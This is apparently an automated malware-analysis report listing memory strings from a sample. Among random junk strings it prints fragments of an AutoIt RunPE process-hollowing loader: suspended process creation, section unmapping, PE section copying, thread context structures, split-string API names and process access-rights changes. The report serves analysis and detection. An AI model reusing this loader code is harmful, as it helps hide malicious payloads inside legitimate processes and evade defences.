Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: zf43tpn47s51o5454d6 memstr_3e6806b2-d
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 882t0k54i8t9ai5a) memstr_27b11c54-2
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: y0a8yy0hflh848qg memstr_dd5cfb6c-8
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 332ke memstr_4d7a73e7-2
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: k763139foz4_) memstr_9d23a726-c
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 9r9b5quscc091oj0k23 memstr_854f03b9-9
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 5637s4z0o52bvt5u) memstr_94ea1ef3-4
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local $tenries, $idata, $taddress51 memstr_224a0319-c
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local $iflag = 3 + 7 * $fimagex64oy memstr_d69592a3-8
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: zd^}h memstr_6a162025-8
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: i)"k? memstr_1bb8f79a-4
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: td00133 memstr_1b950a3e-7
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: cyx04n6ph39ikt68jl5obfa47w4 memstr_cbeae223-0
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 5p69k4zs5adqm memstr_6320f77b-1
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ~n.a@ memstr_c859f5f1-7
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: sq8hx3s2n81 memstr_92d937b8-8
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: b1t5uu memstr_8ffeddff-1
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 7o2a89423m035xwncaz6uebu05ovgy454k2v memstr_78d0121f-7
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $var106 = dllstructgetptr($var93) memstr_a4d413c7-5
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $var108 = dllstructgetptr($var95) memstr_509da4ca-f
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: for $i = 1 to $inumberofsectionse9 memstr_fcafe5cf-5
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if @error or $acall[0] = -1 then memstr_73efa1ad-b
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: func __runpe($binary, $sexemodule) memstr_a84fb245-1
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: kgjjx8k1rj45* memstr_359486ee-a
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 0jv4a145f3j6t12qjlq0g7dob790ff memstr_55cf6d1c-6
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 29563ie7t2142u6 memstr_00c957ae-3
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: __runpe($bbinaryimage, $sexemodule) memstr_6b023c3f-a
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 3^lm*# memstr_a7880254-7
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 'ke5r memstr_695c8843-a
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dllstructsetdata($var93, 6, "1")' memstr_08559960-e
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 58a05f85vrqpzyc70uhll memstr_1f220191-c
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dllstructsetdata($var93, 7, "0") memstr_85ce0bbb-6
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ^kaxr%d memstr_9728b166-0
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: kiqs* memstr_4a8dbbfb-7
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 0x40fdh57of7cra memstr_84ed0d66-5
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: g61a0z6b9gb memstr_afd6d3fd-6
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 0xs0691ov5oonqn86m456l139x0 memstr_2aef0417-8
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 864rodt memstr_b7fa1220-7
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: i@-?u\ memstr_952ea3f6-4
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: t1c' memstr_c583d097-e
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 4itb9a3497r8wky memstr_97a3b755-e
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: f08s6n9478yz7x memstr_514e286f-5
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: osq^f memstr_59ba1039-0
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $var110 = dllcall("advapi32.dll", "dword", "setentriesinacla", "ulong", "1", "ptr", $var106, "ptr", "0", "ptr", $var108) memstr_e62aa5b4-8
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $var113 = dllcall("advapi32.dll", "dword", "setsecurityinfo", "handle", $var92, "int", "6", "dword", "0x00000004", "dword", "0", "dword", "0", "ptr", dllstructgetdata($var95, 1), "ptr", 0) memstr_df0d5134-4
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if not ubound($var110) then return seterror(4, 0, false) memstr_1210144c-2
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if not ubound($var113) then return seterror(5, 0, false) memstr_a6084d8e-1
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dllstructsetdata($tmodule, 1, dllstructgetdata($theaders, 1))/$ memstr_9b44293f-c
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local $smagic = dllstructgetdata($timage_dos_header, "magic") memstr_357ad393-7
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if $var110[0] <> 0 then return seterror(6, $var110[0], false)a$u memstr_e2253d7a-4
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if $var113[0] <> 0 then return seterror(7, $var113[0], false) memstr_531db188-a
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if $fautoitx64 and _runbinary_iswow64process($handlerpro) thens%c memstr_feebff9f-a
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: t`xvp memstr_afdcca5e-6
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: hl0vp memstr_9f486204-f
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ~pxp memstr_07ece005-7
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: =ghvp memstr_971b4a7e-c
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: endifl&_ memstr_2ed38096-9
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: elseq&d memstr_7f575c80-d
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ^v`vp memstr_156ece7b-b
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: #pwp memstr_5b87c7e3-d
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: case 1 memstr_a4c3253c-0
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: case 2 memstr_51481cb9-2
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: case 3 memstr_cebd67c4-1
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: endif(' memstr_f6f04665-6
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: endif/' memstr_f6f5119e-5
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: case 3$' memstr_9b07f697-c
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: endif=' memstr_99f2f96e-a
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: endif]'` memstr_c1d0d251-a
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: func _runpe($bbinaryimage, $scommandline = '', $sexemodule = @autoitexe) memstr_989e5ce3-a
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local $tbinary = dllstructcreate("byte[" & binarylen($bbinary) & "]") memstr_9411307d-0
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local $tstartupinfo = dllstructcreate("dword cbsize;" & "ptr reserved;" & "ptr desktop;" & "ptr title;" & "dword x;" & "dword y;" & "dword xsize;" & "dword ysize;" & "dword xcountchars;" & "dword ycountchars;" & "dword fillattribute;" & "dword flags;" & "word showwindow;" & "word reserved2;" & "ptr reserved2;" & "ptr hstdinput;" & "ptr hstdoutput;" & "ptr hstderror") memstr_de68ad62-6
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local $tprocess_information = dllstructcreate("ptr process;" & "ptr thread;" & "dword processid;" & "dword threadid") memstr_9eba84be-a
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local $acall = dllcall("kernel32.dll", "bool", "createprocessw", "wstr", $sexemodule, "wstr", $scommandline, "ptr", 0, "ptr", 0, "int", 0, "dword", 4, "ptr", 0, "ptr", 0, "ptr", dllstructgetptr($tstartupinfo), "ptr", dllstructgetptr($tprocess_information)) memstr_bcde8035-5
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if @error or not $acall[0] then return seterror(1, 0, 0) memstr_78bfe17c-a
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local $ivirtualaddress, $isizeofblock, $inumberofentries ! memstr_5a1fc97a-4
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local $tmagic = dllstructcreate("word magic;", $ppointer) memstr_afb80f61-9
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if @error or not $acall[0] then return seterror(1, 0, 0) " memstr_bec0b261-6
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if @error or not $acall[0] then return seterror(1, 0, 0)@"| memstr_8c20e9c1-b
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: func _runbinary_unmapviewofsection($handlerpro, $paddress) memstr_2035a622-4
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local $handlerpro = dllstructgetdata($tprocess_information, "process") memstr_2b1a6f5d-4
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dllcall("kernel32.dll", "bool", "term"&"inatepr"&"ocess", "handle", $handlerpro, "dword", 0)p memstr_42f0e62c-9
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $tcontext = dllstructcreate("dword con" & "text" & "flags;" & "dword dr0; dword dr1; dword dr2; dword dr3; dword dr6; dword dr7;" & "dword controlword; dword statusword; dword tagword; dword erroroffset; dword errorselector; dword dataoffset; dword dataselector; byte registerarea[80]; dword cr0npxstate;" & "dword seggs; dword segfs; dword seges; dword segds;" & "dword edi; dword esi; dword ebx; dword edx; dword ecx; dword eax;" & "dword ebp; dword eip; dword segcs; dword eflags; dword esp; dword segss;" & "byte extendedregisters[512]")"u memstr_b928f963-e
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local $timage_dos_header = dllstructcreate("char magic[2];" & "word bytesonlastpage;" & "word pages;" & "word relocations;" & "word sizeofheader;" & "word minimumextra;" & "word maximumextra;" & "word ss;" & "word sp;" & "word checksum;" & "word ip;" & "word cs;" & "word relocation;" & "word overlay;" & "char reserved[8];" & "word oemidentifier;" & "word oeminformation;" & "char reserved2[20];" & "dword addressofnewexeheader", $ppointer)64 memstr_e448c2a7-8
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: eptiontorip; ui memstr_877a363e-4
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 1875f38/3f6b74/78/3f4b74/2ebe78bc55f5e5b595a5dc35552515356578b6c241c85ed74438b453c8b542878/3d58b4a188b5a2//3dde33/498b348b/3f533ff33c/fcac84c/74/7c1cf/d/3f8ebf43b7c242/75e18b5a24/3dd668b/c4b8b5a1c/3dd8b/48b/3c55f5e5b595a5dc3c3////////"3////"e;" & "dword environmentupdatecount;" & "ptr kernelcallbacktable;" & "ptr eventlogsection;" & "ptr eventlog;" & "ptr freelist;" & "dword tlsexpansioncounter;" & "ptr tlsbitmap;" & "dword tlsbitmapbits[2];" & "ptr readonlysharedmemorybase;" & "ptr readonlysharedmemoryheap;" & "ptr readonlystaticserverdata;" & "ptr ansicodepagedata;" & "ptr oemcodepagedata;" & "ptr unicodecasetabledata;" & "dword numberofprocessors;" & "dword ntglobalflag;" & "byte spare2[4];" & "int64 criticalsectiontimeout;" & "dword heapsegmentreserve;" & "dword heapsegmentcommit;" & "dword heapdecommittotalfreethreshold;" & "dword heapdecommitfreeblockthreshold;" & "dword numberofheaps;" & "dword maximumnumberofheaps;" & "ptr processheaps;" & "ptr gdisharedhandletable;" & "ptr processstarterhelper;" & "ptr gdidcattributelist;" & "ptr loaderlock;" & "dword osmajorversion;" & "dword osminorversion;" & "dword osbuildnumber;" & "dword osplatformid;" & "dword imagesubsystem;" & "dword imagesubsystemmajorversion;" & "dword imagesubsystemminorversion;" & "dword gdihandlebuffer[34];" & "dword postprocessinitroutine;" & "dword tlsexpansionbitmap;" & "byte tlsexpansionbitmapbits[128];" & "dword sessionid") memstr_223c5176-4
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $tcontext = dllstructcreate("align 16; uint64 p1home; uint64 p2home; uint64 p3home; uint64 p4home; uint64 p5home; uint64 p6home;" & "dword cont" & "ext" & "flags; dword mxcsr;" & "word segcs; word segds; word seges; word segfs; word seggs; word segss; dword eflags;" & "uint64 dr0; uint64 dr1; uint64 dr2; uint64 dr3; uint64 dr6; uint64 dr7;" & "uint64 rax; uint64 rcx; uint64 rdx; uint64 rbx; uint64 rsp; uint64 rbp; uint64 rsi; uint64 rdi; uint64 r8; uint64 r9; uint64 r10; uint64 r11; uint64 r12; uint64 r13; uint64 r14; uint64 r15;" & "uint64 rip;" & "uint64 header[4]; uint64 legacy[16]; uint64 xmm0[2]; uint64 xmm1[2]; uint64 xmm2[2]; uint64 xmm3[2]; uint64 xmm4[2]; uint64 xmm5[2]; uint64 xmm6[2]; uint64 xmm7[2]; uint64 xmm8[2]; uint64 xmm9[2]; uint64 xmm10[2]; uint64 xmm11[2]; uint64 xmm12[2]; uint64 xmm13[2]; uint64 xmm14[2]; uint64 xmm15[2];" & "uint64 vectorregister[52]; uint64 vectorcontrol;" & "uint64 debugcontrol; uint64 lastbranchtorip; uint64 lastbranchfromrip; uint64 lastexceptiontorip; uint64 lastexceptionfromrip") memstr_4af418ca-9
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dllcall("kernel32.dll", "bool", "term"&"inatepr"&"ocess", "handle", $handlerpro, "dword", 0) memstr_68895962-c
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local $timage_nt_signature = dllstructcreate("dword signature", $ppointer) memstr_92c54b9c-3
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if dllstructgetdata($timage_nt_signature, "signature") <> 17744 then memstr_064ee42e-6
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local $timage_file_header = dllstructcreate("word machine;" & "word numberofsections;" & "dword timedatestamp;" & "dword pointertosymboltable;" & "dword numberofsymbols;" & "word sizeofoptionalheader;" & "word characteristics", $ppointer) memstr_49c2e699-a
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local $inumberofsections = dllstructgetdata($timage_file_header, "numberofsections") memstr_4f62f5b1-2
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $timage_optional_header = dllstructcreate("word magic;" & "byte majorlinkerversion;" & "byte minorlinkerversion;" & "dword sizeofcode;" & "dword sizeofinitializeddata;" & "dword sizeofuninitializeddata;" & "dword addressofentrypoint;" & "dword baseofcode;" & "dword baseofdata;" & "dword imagebase;" & "dword sectionalignment;" & "dword filealignment;" & "word majoroperatingsystemversion;" & "word minoroperatingsystemversion;" & "word majorimageversion;" & "word minorimageversion;" & "word majorsubsystemversion;" & "word minorsubsystemversion;" & "dword win32versionvalue;" & "dword sizeofimage;" & "dword sizeofheaders;" & "dword checksum;" & "word subsystem;" & "word dllcharacteristics;" & "dword sizeofstackreserve;" & "dword sizeofstackcommit;" & "dword sizeofheapreserve;" & "dword sizeofheapcommit;" & "dword loaderflags;" & "dword numberofrvaandsizes", $ppointer) memstr_b5e6a46b-0
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $timage_optional_header = dllstructcreate("word magic;" & "byte majorlinkerversion;" & "byte minorlinkerversion;" & "dword sizeofcode;" & "dword sizeofinitializeddata;" & "dword sizeofuninitializeddata;" & "dword addressofentrypoint;" & "dword baseofcode;" & "uint64 imagebase;" & "dword sectionalignment;" & "dword filealignment;" & "word majoroperatingsystemversion;" & "word minoroperatingsystemversion;" & "word majorimageversion;" & "word minorimageversion;" & "word majorsubsystemversion;" & "word minorsubsystemversion;" & "dword win32versionvalue;" & "dword sizeofimage;" & "dword sizeofheaders;" & "dword checksum;" & "word subsystem;" & "word dllcharacteristics;" & "uint64 sizeofstackreserve;" & "uint64 sizeofstackcommit;" & "uint64 sizeofheapreserve;" & "uint64 sizeofheapcommit;" & "dword loaderflags;" & "dword numberofrvaandsizes", $ppointer) memstr_f521dc63-c
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local $ientrypointnew = dllstructgetdata($timage_optional_header, "addressofentrypoint") memstr_9ecaadc9-a
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local $ioptionalheadersizeofheadersnew = dllstructgetdata($timage_optional_header, "sizeofheaders") memstr_44fe8b5f-f
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local $poptionalheaderimagebasenew = dllstructgetdata($timage_optional_header, "imagebase") memstr_0a5a2796-b
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local $ioptionalheadersizeofimagenew = random(104857600, 209715200, 1) memstr_d2ff2c82-d
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local $timage_dir3ctory_entry_basereloc = dllstructcreate("dword virtualaddress; dword size", $ppointer) memstr_95224542-4
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local $paddressnewbasereloc = dllstructgetdata($timage_dir3ctory_entry_basereloc, "virtualaddress") memstr_b49ab16f-0
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if $paddressnewbasereloc and $isizebasereloc then $frelocatable = true memstr_fdefa476-b
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: consolewrite("!!!not relocatable module. i will try but this may not work!!!" & @crlf) memstr_375d623e-7
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $pzeropoint = _runbinary_allocateexespace($handlerpro, $ioptionalheadersizeofimagenew) memstr_b8cb1187-d
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $pzeropoint = _runbinary_allocateexespaceataddress($handlerpro, $poptionalheaderimagebasenew, $ioptionalheadersizeofimagenew) memstr_cb0edd35-c
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _runbinary_unmapviewofsection($handlerpro, $poptionalheaderimagebasenew) memstr_9c9e8b93-e
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local $theaders = dllstructcreate("byte[" & $ioptionalheadersizeofheadersnew & "]", $pheaders_new) memstr_c06916d5-8
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: endfunc'4g memstr_b958d137-8
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: endfunc<4p memstr_07a1234f-5
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: case 185| memstr_67817d58-1
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: endif45 memstr_93c2a76e-1
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: case 25 memstr_beafd5bf-2
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: endfunc~5> memstr_f1468e40-8
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: endifp54 memstr_044c7d15-3
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $timage_section_header = dllstructcreate("char name[8];" & "dword unionofvirtualsizeandphysicaladdress;" & "dword virtualaddress;" & "dword sizeofrawdata;" & "dword pointertorawdata;" & "dword pointertorelocations;" & "dword pointertolinenumbers;" & "word numberofrelocations;" & "word numberoflinenumbers;" & "dword characteristics", $ppointer) memstr_0a9754ba-5
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $isizeofrawdata = dllstructgetdata($timage_section_header, "sizeofrawdata") memstr_1021f23f-d
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $ppointertorawdata = $pheaders_new + dllstructgetdata($timage_section_header, "pointertorawdata") memstr_ebfa204c-5
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $ivirtualaddress = dllstructgetdata($timage_section_header, "virtualaddress") memstr_1c67e194-b
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $ivirtualsize = dllstructgetdata($timage_section_header, "unionofvirtualsizeandphysicaladdress") memstr_ecfab749-6
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if $ivirtualsize and $ivirtualsize < $isizeofrawdata then $isizeofrawdata = $ivirtualsize memstr_8038deaf-c
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dllstructsetdata(dllstructcreate("byte[" & $isizeofrawdata & "]", $pmodule + $ivirtualaddress), 1, dllstructgetdata(dllstructcreate("byte[" & $isizeofrawdata & "]", $ppointertorawdata), 1)) memstr_cb47521f-7
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if $ivirtualaddress <= $paddressnewbasereloc and $ivirtualaddress + $isizeofrawdata > $paddressnewbasereloc then memstr_005a2846-1
